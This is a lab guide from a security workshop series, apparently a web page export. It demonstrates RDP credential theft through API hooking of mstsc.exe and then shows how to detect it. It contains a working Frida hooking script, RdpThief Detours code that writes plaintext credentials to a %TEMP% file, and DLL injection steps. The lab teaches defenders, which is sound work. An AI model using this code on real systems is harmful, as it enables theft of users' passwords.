{"id":7751,"date":"2021-04-07T09:00:00","date_gmt":"2021-04-07T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/?post_type=lab_item&#038;p=7751"},"modified":"2026-05-22T12:53:25","modified_gmt":"2026-05-22T11:53:25","slug":"attack-detection-fundamentals-2021-windows-lab-3","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/","title":{"rendered":"Attack Detection Fundamentals 2021: Windows &#8211; Lab #3"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals 2021: Windows &#8211; <span class=\"blue-text\">Lab #3<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Software 
Protection                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                07 April, 2021                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#3\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #3&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link 
wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 
219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_1200c3b3b9839b813a487e18a46957cf\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Alfie Champion<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                          
      <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Riccardo Ancarani<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Content navigation            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    Select a section                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator 
js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#3\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #3&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        
<\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the first part of WithSecure Consulting&#x27;s Attack Detection Fundamentals workshop series for 2021, we covered advanced defense evasion and credential access techniques targeting Windows endpoints. This included the offensive and defensive use of API hooking, as well as the theft of cookies to enable &#x27;session hijacking&#x27;.<\/p>\n<p>A recording of the first workshop can be found <a href=\"https:\/\/www.youtube.com\/watch?v=h1OBjMx-R-M\" target=\"_blank\" rel=\"noopener\">here<\/a> and the slides are available <a href=\"https:\/\/www.f-secure.com\/content\/dam\/f-secure\/en\/consulting\/events\/collaterals\/digital\/f-secure_attack-detection-fundamentals-workshop-1-windows_2021-04-07.pdf\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In the previous lab &#8211; guides available <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-1\/\" target=\"_blank\" rel=\"noopener\">here<\/a> and <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-2\/\" target=\"_blank\" rel=\"noopener\">here<\/a> &#8211; we developed an initial access payload that explored several defensive (and offensive) concepts. Amongst others, we observed AMSI blocking our Covenant Grunt shellcode, Sysmon logging a CreateRemoteThread event (EID 8), and we emulated an EDR using userland API hooks with Frida. This last concept leads us neatly into our next lab.<\/p>\n<p>One of the core parts of an offensive operation is the post exploitation phase. Post exploitation is a broad term that includes all the attacker&#x27;s actions that are performed after an initial foothold is obtained. 
Whilst discussing all the post exploitation activities goes beyond the scope of this lab guide, it is possible to refer back to Mitre&#x27;s <a href=\"https:\/\/attack.mitre.org\/matrices\/enterprise\/\" target=\"_blank\" rel=\"noopener\">ATT&amp;CK Matrix<\/a> to have a more comprehensive view of the topic.<\/p>\n<p>For this lab, we&#x27;ll turn the tables on the defensive use of API hooking and apply the same principles in an offensive post exploitation context. We&#x27;ll target a user authenticating to a host using Remote Desktop, and hook the functions that provide us with their plaintext credentials.<\/p>\n<p>API hooking is a concept that was already discussed in the workshops and in the first lab of this series, but in a nutshell we could describe it as a technique used to intercept API calls and perform additional tasks before and after their execution. Examples of use cases for API hooking:<\/p>\n<ul>\n<li>Extending an application&#x27;s functionality without the need for accessing its source code.<\/li>\n<li>Monitoring dangerous APIs being used for malicious purposes.<\/li>\n<li>Something nasty we are just about to see.<\/li>\n<\/ul>\n<p>For lab two, we&#x27;re going to demonstrate API hooking leveraging some great <a href=\"https:\/\/www.mdsec.co.uk\/2019\/11\/rdpthief-extracting-clear-text-credentials-from-remote-desktop-clients\/\" target=\"_blank\" rel=\"noopener\">research<\/a> published by MDSec, with their tool <a href=\"https:\/\/github.com\/0x09AL\/RdpThief\/\" target=\"_blank\" rel=\"noopener\">RdpThief<\/a>.<\/p>\n<h2>Required Tools<\/h2>\n<ul>\n<li>1x Windows VM<\/li>\n<li><a href=\"http:\/\/www.rohitab.com\/apimonitor\" target=\"_blank\" rel=\"noopener\">API Monitor<\/a><\/li>\n<li>Visual Studio 2019 Community Edition<\/li>\n<li><a href=\"https:\/\/github.com\/hasherezade\/pe-sieve\" target=\"_blank\" rel=\"noopener\">Pe-Sieve<\/a><\/li>\n<li><a href=\"https:\/\/www.hex-rays.com\/products\/ida\/support\/download_freeware\/\" 
target=\"_blank\" rel=\"noopener\">IDA Freeware<\/a><\/li>\n<li>Sysmon<\/li>\n<\/ul>\n<p>DISCLAIMER: Setup of the tools and the testing environment is not covered comprehensively within this lab. We will assume basic familiarity with the Windows command line and the ability of the reader to build the necessary tools.<\/p>\n<h2>Walkthrough<\/h2>\n<p>Our objective for this lab is not to blindly run a tool, but rather to show a methodology and the thought process of both the offensive and the defensive side of the attack. The first step, then, is to discern if cleartext credentials are actually being passed by the RDP client when connecting (imagining that we didn&#x27;t already know the outcome of the MDSec research!).<\/p>\n<p>Let&#x27;s start the RDP client, or &quot;mstsc.exe&quot;, and start monitoring its API using API Monitor:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328124935576.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The tricky part about API Monitor is that you need to explicitly select the APIs, or classes of APIs, that you want to monitor. 
A good general approach would be to start by including APIs related to networking, security and administration.<\/p>\n<p>Now let&#x27;s attempt to log in using invalid credentials:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328125203799.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Of course the credentials did not work, but if we go back to API Monitor we will see that it captured some data:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328125227362.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>From an attacker&#x27;s perspective, we are interested in knowing the following:<\/p>\n<ul>\n<li>The server the victim tried to connect to.<\/li>\n<li>The username used.<\/li>\n<li>The password.<\/li>\n<\/ul>\n<p>API Monitor offers a handy search feature that will inspect all the intercepted data and show us the functions of interest. 
By either using that, or manually inspecting the captured API data, we can immediately notice that the remote server&#x27;s IP is being passed as a second argument to the &#x27;SspiPrepareForCredRead&#x27; function:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328125900087-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The username was passed as the only argument to the &#x27;CredIsMarshaledCredentialW&#x27; function:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328130535523-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>And finally, the cleartext password was indeed passed to the &#x27;CryptProtectMemory&#x27; API:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328131124613-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>Proof-Of-Concept<\/h3>\n<p>Now that we know what to look for, we could whip up a proof-of-concept. In the first <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-2\/\" target=\"_blank\" rel=\"noopener\">lab<\/a>, we saw how Frida could be used to log the calling of APIs of interest (that time it was our &#x27;NtCreateThreadEx&#x27; call from mshta.exe). We can make use of it here to pull out the credential material provided when authenticating to our remote host.<\/p>\n<p>To demonstrate just a small amount of the huge capability that Frida provides, we will actually hook a slightly different set of APIs. Our &#x27;SspiPrepareForCredRead&#x27; function from Sspicli.dll just as before, but this time we will hook &#x27;CredUnPackAuthenticationBufferW&#x27; from Credui.dll too. 
As its name suggests, this latter function unpacks the user credentials entered into the login window seen above, once a user opts to initiate the RDP connection to their target host.<\/p>\n<p>FuzzySecurity already has an example Frida script for just this purpose in the example scripts of their <a href=\"https:\/\/github.com\/FuzzySecurity\/Fermion\" target=\"_blank\" rel=\"noopener\">Fermion<\/a> tool repo <a href=\"https:\/\/github.com\/FuzzySecurity\/Fermion\/blob\/master\/Examples\/RdpThief.js\" target=\"_blank\" rel=\"noopener\">here<\/a>. Tweaking it ever so slightly for more readable log output, we can use this script to hook our APIs and extract the output we&#x27;re after:<\/p>\n<pre><code class=\"language-bash\">\/\/--------------------------------------------------------------------------------------------------------------\/\/\n\/\/ RDP credential theft, adapted from research by @0x09AL \/\/\n\/\/ URL: https:\/\/www.mdsec.co.uk\/2019\/11\/rdpthief-extracting-clear-text-credentials-from-remote-desktop-clients\/ \/\/\n\/\/--------------------------------------------------------------------------------------------------------------\/\/\n\n\/\/ Native function pointer\nvar pSspiPrepareForCredRead = Module.findExportByName(&quot;SspiCli.dll&quot;, &#x27;SspiPrepareForCredRead&#x27;)\nvar pCredUnPackAuthenticationBufferW = Module.findExportByName(&quot;Credui.dll&quot;, &#x27;CredUnPackAuthenticationBufferW&#x27;)\n\n\/\/ Globals\nvar sTargetHost;\n\n\/\/ This function is called any time the target is updated and when clicking\n\/\/ on connect. 
We are only interested in the last value that was set before\n\/\/ calling Credui!CredUnPackAuthenticationBufferW.\n\/\/ =&gt; https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/api\/sspi\/nf-sspi-sspiprepareforcredread\nInterceptor.attach(pSspiPrepareForCredRead, {\nonEnter: function (args) {\n\/\/ Update global when the function is called\nsTargetHost = args[1].readUtf16String();\n}\n});\n\n\/\/ This function is only called when the user finally tries to initiate the\n\/\/ connection to the server.\n\/\/ =&gt; https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/api\/wincred\/nf-wincred-credunpackauthenticationbufferw\nInterceptor.attach(pCredUnPackAuthenticationBufferW, {\nonEnter: function (args) {\n\/\/ Save ptr&#x27;s to poll data in onLeave\nthis.pszUserName = args[3];\nthis.pszPassword = args[7];\n},\nonLeave: function (retval) {\nconsole.log(&quot;\\n|-------&quot;);\nconsole.log(&quot;| Server : &quot; + sTargetHost);\nconsole.log(&quot;| User : &quot; + this.pszUserName.readUtf16String());\nconsole.log(&quot;| Pass : &quot; + this.pszPassword.readUtf16String());\nconsole.log(&quot;|-------&quot;);\n}\n});<\/code><\/pre>\n<p>With our script ready, we can hook a running &#x27;mstsc.exe&#x27; process and provide our script as an argument.<\/p>\n<pre><code class=\"language-bash\">frida -n mstsc.exe -l [hooking_script].js<\/code><\/pre>\n<p>We mentioned in the workshop how EDR&#x27;s implement API hooking through the loading of their DLL, and if we fire up <a href=\"https:\/\/github.com\/processhacker\/processhacker\/\" target=\"_blank\" rel=\"noopener\">Process Hacker<\/a> and take a look at our &#x27;mstsc.exe&#x27; process, we can see the same behaviour from Frida as it &#x27;attaches&#x27; to our target process to implement the hooks we&#x27;ve specified.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/frida.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>With Frida set up, 
when we authenticate, we should see the target host, username and password output in the console.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/frida-rdp-hook.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>Weaponisation<\/h3>\n<p>So how do we take the concepts we&#x27;ve seen up to now and turn them into something that is more likely to be observed in a real-world attack? There are multiple ways of intercepting APIs; however, the most popular is called &quot;inline hooking&quot;. Inline hooking is a technique where the first bytes of a function are overwritten with a jump to another module (DLL) that can then inspect the parameters passed to the function and eventually restore the execution flow. Inspection of the parameters is achieved in different ways depending on the architecture of the process (x64 vs x86), since in 32-bit processes arguments (in assembler) are passed exclusively using the stack whilst in 64-bit applications it&#x27;s done by a combination of registers and stack.<\/p>\n<p>Luckily we do not need to go that deep to implement hooking, since we can rely on the hard work done to build the <a href=\"https:\/\/github.com\/microsoft\/Detours\" target=\"_blank\" rel=\"noopener\">Detours<\/a> library that we will use to accomplish this. The library simply abstracts the creation of hooks and allows us to use a higher level language such as C++ to create API hooks. 
We will not write the hooking code from scratch, but rather rely on Rio&#x27;s <a href=\"https:\/\/github.com\/0x09AL\/RdpThief\/blob\/master\/RdpThief\/RdpThief.cpp\" target=\"_blank\" rel=\"noopener\">RdpThief<\/a> work.<\/p>\n<p>Let&#x27;s clone and build the solution in Visual Studio:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328132118148.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>RdpThief&#x27;s code is extremely simple and easy to read. We can see that the core function that gets executed when the DLL is loaded is the following:<\/p>\n<pre><code class=\"language-bash\">if (DetourIsHelperProcess()) {\nreturn TRUE;\n}\n\nif (dwReason == DLL_PROCESS_ATTACH) {\nDetourRestoreAfterWith();\nDetourTransactionBegin();\nDetourUpdateThread(GetCurrentThread());\nDetourAttach(&amp;(PVOID&amp;)OriginalCryptProtectMemory, _CryptProtectMemory);\nDetourAttach(&amp;(PVOID&amp;)OriginalCredIsMarshaledCredentialW, _CredIsMarshaledCredentialW);\nDetourAttach(&amp;(PVOID&amp;)OriginalSspiPrepareForCredRead, _SspiPrepareForCredRead);\nDetourTransactionCommit();\n}\nelse if (dwReason == DLL_PROCESS_DETACH) {\nDetourTransactionBegin();\nDetourUpdateThread(GetCurrentThread());\nDetourDetach(&amp;(PVOID&amp;)OriginalCryptProtectMemory, _CryptProtectMemory);\nDetourDetach(&amp;(PVOID&amp;)OriginalCredIsMarshaledCredentialW, _CredIsMarshaledCredentialW);\nDetourDetach(&amp;(PVOID&amp;)OriginalSspiPrepareForCredRead, _SspiPrepareForCredRead);\nDetourTransactionCommit();\n}\nreturn TRUE;<\/code><\/pre>\n<p>Notice that the &#x27;DetourAttach&#x27; function is responsible for installing the hooks. 
As an example, the line:<\/p>\n<pre><code class=\"language-bash\">DetourAttach(&amp;(PVOID&amp;)OriginalCryptProtectMemory, _CryptProtectMemory);<\/code><\/pre>\n<p>This can effectively be interpreted as: &quot;Attach a hook to the OriginalCryptProtectMemory function and divert it to my _CryptProtectMemory custom procedure&quot;.<\/p>\n<p>Where &#x27;OriginalCryptProtectMemory&#x27; is the address of the original &#x27;CryptProtectMemory&#x27; and &#x27;_CryptProtectMemory &#x27; is the function that we created, that will save the relevant parameter for later inspection and restore execution to the original function.<\/p>\n<p>We can see for example the &#x27;_SspiPrepareForCredRead&#x27; function&#x27;s body:<\/p>\n<pre><code class=\"language-bash\">SECURITY_STATUS _SspiPrepareForCredRead(\nPSEC_WINNT_AUTH_IDENTITY_OPAQUE AuthIdentity,\nPCWSTR pszTargetName,\nPULONG pCredmanCredentialType,\nPCWSTR *ppszCredmanTargetName)\n{\nlpServer = pszTargetName;\nreturn OriginalSspiPrepareForCredRead(AuthIdentity, pszTargetName, pCredmanCredentialType, ppszCredmanTargetName);\n}<\/code><\/pre>\n<p>The only thing it does is save the address of the remote server (&#x27;pszTargetName&#x27;) and call the original function. 
The data is then written to disk within the user&#x27;s &#x27;%TEMP%&#x27; folder:<\/p>\n<pre><code class=\"language-bash\">VOID WriteCredentials() {\nconst DWORD cbBuffer = 1024;\nTCHAR TempFolder[MAX_PATH];\nGetEnvironmentVariable(L&quot;TEMP&quot;, TempFolder, MAX_PATH);\nTCHAR Path[MAX_PATH];\nStringCbPrintf(Path, MAX_PATH, L&quot;%s\\\\data.bin&quot;, TempFolder);\nHANDLE hFile = CreateFile(Path, FILE_APPEND_DATA, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);\nWCHAR DataBuffer[cbBuffer];\nmemset(DataBuffer, 0x00, cbBuffer);\nDWORD dwBytesWritten = 0;\nStringCbPrintf(DataBuffer, cbBuffer, L&quot;Server: %s\\nUsername: %s\\nPassword: %s\\n\\n&quot;,lpServer, lpUsername, lpTempPassword);\n\nWriteFile(hFile, DataBuffer, wcslen(DataBuffer)*2, &amp;dwBytesWritten, NULL);\nCloseHandle(hFile);\n}<\/code><\/pre>\n<p>We can test it by loading the compiled DLL (the architecture needs to match the &#x27;mstsc&#x27; one, usually 64-bit on modern systems) with <a href=\"https:\/\/github.com\/processhacker\/processhacker\/\" target=\"_blank\" rel=\"noopener\">Process Hacker<\/a>:<\/p>\n<ul>\n<li>Select &#x27;mstsc&#x27;<\/li>\n<li>Right-click -&gt; Miscellaneous -&gt; Inject DLL<\/li>\n<li>Select &#x27;RdpThief.dll&#x27;<\/li>\n<\/ul>\n<p>Just as with Frida, you should see the DLL listed in the &#x27;Modules&#x27; section within Process Hacker:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328132926695.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Authenticating to a remote host, you should be able to see your cleartext credentials stored in a file called &#x27;data.bin&#x27; within the %TEMP% folder. Cool eh? Note that this on-disk file is itself an artifact a defender can look for: an RDP client process creating and appending to a file in %TEMP% is not normal behaviour.<\/p>\n<p>The attack doesn&#x27;t actually stop here, since from an operational perspective it would be better to have shellcode, rather than a DLL that needs to be dropped on disk. 
The research author used the <a href=\"https:\/\/github.com\/monoxgas\/sRDI\" target=\"_blank\" rel=\"noopener\">sRDI<\/a> project to accomplish that, but we will leave that as an exercise for the reader.<\/p>\n<h2>Detection<\/h2>\n<p>Hooking leaves traces behind; one of them is the fact that we modified the code of the functions that we wanted to intercept. Within Windows, every process refers to the same address when accessing a DLL. However, when a DLL is modified just for one process, Windows transparently copies the code of the modified DLL and allows the program to do basically anything with it. This mechanism is called &quot;copy-on-write&quot;.<\/p>\n<p>Let&#x27;s use an open source memory scanner to analyse our &#x27;mstsc&#x27; process. We will use &#x27;Pe-Sieve&#x27; for this:<\/p>\n<pre><code class=\"language-bash\">.\\pe-sieve64.exe \/pid 5856\nScanning workingset: 895 memory regions.\n[*] Workingset scanned in 375 ms\n[+] Report dumped to: process_5856\n[*] Dumped module to: C:\\Users\\Developer\\Desktop\\Tools\\\\process_5856\\7ff987be0000.advapi32.dll as UNMAPPED\n[*] Dumped module to: C:\\Users\\Developer\\Desktop\\Tools\\\\process_5856\\7ff978400000.RdpThief.dll as UNMAPPED\n[+] Dumped modified to: process_5856\n[+] Report dumped to: process_5856\n---\nPID: 5856\n---\nSUMMARY:\n\nTotal scanned: 117\nSkipped: 0\n-\nHooked: 2\nReplaced: 0\nHdrs Modified: 0\nIAT Hooks: 0\nImplanted: 0\nUnreachable files: 0\nOther: 0\n-\nTotal suspicious: 2\n---<\/code><\/pre>\n<p>As we can see, some functions were detected as &quot;patched&quot;. Pe-Sieve is kind enough to dump the suspicious DLLs to disk. 
We can confirm that the DLL &#8211; &#x27;advapi32&#x27; in this case &#8211; was indeed patched, by opening it with IDA and looking for the &#x27;CredIsMarshaledCredentialW&#x27; function:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328133835584.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>We can see that the function&#x27;s body contains only a jump to a foreign module, if we refer back to the screenshot that showed RdpThief being loaded in the RDP client we can see that that address belongs to &#x27;RdpThief.dll&#x27;.<\/p>\n<p>The approach we used is rather manual and tedious and not suitable for automated detection. It might be possible for security products to achieve this though, as they can scan the process memory at scale. However, in certain situations it might be possible to automate part of the detection process. Specifically:<\/p>\n<ul>\n<li>If the malicious DLL gets loaded using DLL injection, the DLL will reside on disk and &#x27;mstsc&#x27; loading it will generate a module load event (Sysmon Event ID 7). The RDP client rarely loads an unsigned DLL from disk, if ever.<\/li>\n<li>If the malicious DLL uses .NET, like FuzzySecurity&#x27;s <a href=\"https:\/\/github.com\/FuzzySecurity\/Sharp-Suite\/tree\/master\/RemoteViewing\" target=\"_blank\" rel=\"noopener\">RemoteViewing<\/a>, &#x27;mstsc&#x27; will also load the CLR (&#x27;clr.dll&#x27;). The RDP client does not normally use .NET and therefore this should be marked as suspicious.<\/li>\n<\/ul>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210328143649982.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h2>Conclusions<\/h2>\n<p>In this lab we&#x27;ve applied the concept of API hooking to post-exploitation, compromising credential material as a user authenticates to a remote host using RDP. 
